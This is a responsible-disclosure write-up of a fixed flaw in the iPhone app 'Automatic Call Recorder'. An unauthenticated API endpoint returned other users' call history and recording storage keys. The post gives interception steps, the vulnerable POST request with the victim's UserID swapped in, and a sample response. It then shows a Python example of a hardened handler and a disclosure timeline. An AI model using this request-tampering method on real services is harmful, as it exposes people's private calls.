How we could have listened to anyone's call recordings.

The vulnerability allowed any malicious actor to listen to any user's call recordings through the application's cloud storage bucket and an unauthenticated API endpoint that leaked the cloud storage URL of the victim's data.

Anand Prakash
March 30, 2021

Note:

This vulnerability was responsibly disclosed by Anand Prakash, PingSafe AI and is now fixed. Special thanks to Zack Whittaker from TechCrunch for helping us with the entire disclosure process and helping in getting this critical vulnerability fixed.
The "Automatic Call Recorder" application is one of the popular applications used by iPhone users to record their calls.
The app is among the top grossing in the Business category of the App Store and is currently #15 in downloads in the Business category worldwide.

Summary:
Anand, with the help of PingSafe AI's threat intelligence product, discovered this vulnerability while doing open source intelligence across mobile applications in different categories. PingSafe AI decompiled the IPA file and identified the S3 buckets, host names and other sensitive details used by the application.
The vulnerability allowed any malicious actor to listen to any user's call recordings through the application's cloud storage bucket and an unauthenticated API endpoint that leaked the cloud storage URL of the victim's data.

Vulnerability Details:
This vulnerability existed in the "/fetch-sinch-recordings.php" API endpoint of the "Automatic Call Recorder" application. An attacker can pass another user's number in the recordings request, and the API will respond with the recording URL in the storage bucket without any authentication. It also leaks the victim's entire call history and the numbers to which calls were made.

Steps to Reproduce:
1) Install the "Automatic Call Recorder" application on your phone.
2) Intercept the application's traffic in Burp Suite/Zap Proxy.
3) You will observe a POST API request to 167.88.123.157:80/fetch-sinch-recordings.php. Change UserID to the victim's phone number with country code.
4) The response will contain the S3 URL for the recording and other sensitive details.


Vulnerable Request:

POST /fetch-sinch-recordings.php HTTP/1.1
Host: 167.88.123.157:80
Content-Type: application/json
Connection: close
Accept: */*
User-Agent: CallRecorder/2.25 (com.arun.callrecorderadvanced; build:1; iOS 14.4.0) Alamofire/4.7.3
Accept-Language: en-IN;q=1.0, kn-IN;q=0.9, hi-IN;q=0.8, hi-Latn-IN;q=0.7
Content-Length: 72
Accept-Encoding: gzip, deflate

{
 "UserID": "xxxxxx",
 "AppID": "xxx"
}

Response:


HTTP/1.1 200 OK
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 413
Connection: close
Content-Type: application/json

[
 {
   "start_time": "1604681",
   "start_time_iso": "2019-10-01T17:58:54+0100",
   "caller_number": "xxxxxxx",
   "callee": "+xxxxxxxxx",
   "marked_as_deleted": "0",
   "user_id": "xxxxxxxxxx",
   "sinch_app_id": "xxxxxxxxxxxx",
   "call_id": "xxxxxxx",
   "s3_key": "call_recordings/1011101/xyzrecording.wav"
 }
]
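
One way to close the gap described above, as an added example that is not the app developer's actual fix or code from the original post: the handler takes the user's identity from a server-issued session token instead of the request body, and returns short-lived signed links rather than raw bucket keys. The token scheme, function names and sample data are assumptions constructed for illustration.

```python
import hashlib
import hmac
import time

SERVER_KEY = b"constructed-demo-key"  # assumption: server-side secret, never shipped in the app

# Constructed sample data shaped like the response in the write-up.
RECORDINGS = {
    "+15550000001": [{"call_id": "c1", "callee": "+15550000009",
                      "s3_key": "call_recordings/0001/a.wav"}],
    "+15550000002": [{"call_id": "c2", "callee": "+15550000008",
                      "s3_key": "call_recordings/0002/b.wav"}],
}

def _mac(msg: str) -> str:
    return hmac.new(SERVER_KEY, msg.encode(), hashlib.sha256).hexdigest()

def issue_token(user_id: str) -> str:
    """Hypothetical: issued only after the server has verified the phone number."""
    return f"{user_id}.{_mac('session|' + user_id)}"

def authenticate(token: str):
    """Return the user id bound to a valid token, else None."""
    user_id, _, mac = (token or "").rpartition(".")
    ok = hmac.compare_digest(mac.encode(), _mac("session|" + user_id).encode())
    return user_id if ok and user_id else None

def signed_url(s3_key: str, now: float, ttl: int = 300) -> str:
    """Stand-in for a storage presigned URL: expires, and is bound to one object."""
    exp = int(now) + ttl
    return f"/recording/{s3_key}?exp={exp}&sig={_mac(f'{s3_key}|{exp}')}"

def fetch_vulnerable(body: dict):
    # Behaviour described in the write-up: the caller-supplied UserID is trusted.
    return 200, RECORDINGS.get(body.get("UserID"), [])

def fetch_hardened(body: dict, token: str, now: float = None):
    now = time.time() if now is None else now
    user_id = authenticate(token)
    if user_id is None:
        return 401, []                       # no valid session
    if body.get("UserID") not in (None, user_id):
        return 403, []                       # asking for someone else's data
    rows = RECORDINGS.get(user_id, [])       # identity comes from the token only
    return 200, [{"call_id": r["call_id"], "callee": r["callee"],
                  "url": signed_url(r["s3_key"], now)} for r in rows]
```

The storage bucket itself also has to be private for the signed links to mean anything; otherwise the object path alone is enough to read a recording.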




Timelines:
Feb 27th, 2021 09:20 PM IST - Vulnerability discovered by Anand Prakash from PingSafe AI
Feb 27th, 2021 10:34 PM IST - The company did not have a responsible disclosure program. Reached out to Zack Whittaker for help with the responsible disclosure. Issue forwarded to the developer.
March 6th, 2021 1:16 AM IST - Confirmation from TechCrunch that the new build will be published soon by the developer.
March 6th, 2021 08:52 PM IST - Bug is fixed and the new version is live on the App Store.

Security issues like this are catastrophic in nature. Along with impacting customers' privacy, they also dent the company's image and give competitors an added advantage.
PingSafe AI uses a state-of-the-art intelligent risk evaluation engine to monitor the security health of a company comprehensively by assessing all domains, IPs, mobile applications, source code and leaked credentials.


ABOUT THE AUTHOR
Anand Prakash

Anand Prakash is a prolific security researcher who is famous for finding bugs in some of the world’s most popular apps and websites. He thrives off of “bug bounties” — large cash prizes he earns from companies in exchange for successfully hacking their systems and showing them their security flaws. Anand is supremely good at what he does, having discovered vulnerabilities at companies like Facebook, Twitter, and Uber. For the past 5 years, Facebook has ranked Anand as one of their top bounty hunters. And on Twitter’s bounty program, he’s ranked #3 worldwide. Anand’s reputation as a hacker has led to him being featured in last year’s Forbes “30 under 30” for enterprise technology in Asia. And a major Indian news website declared Anand “one of India’s best known white hat hackers.”
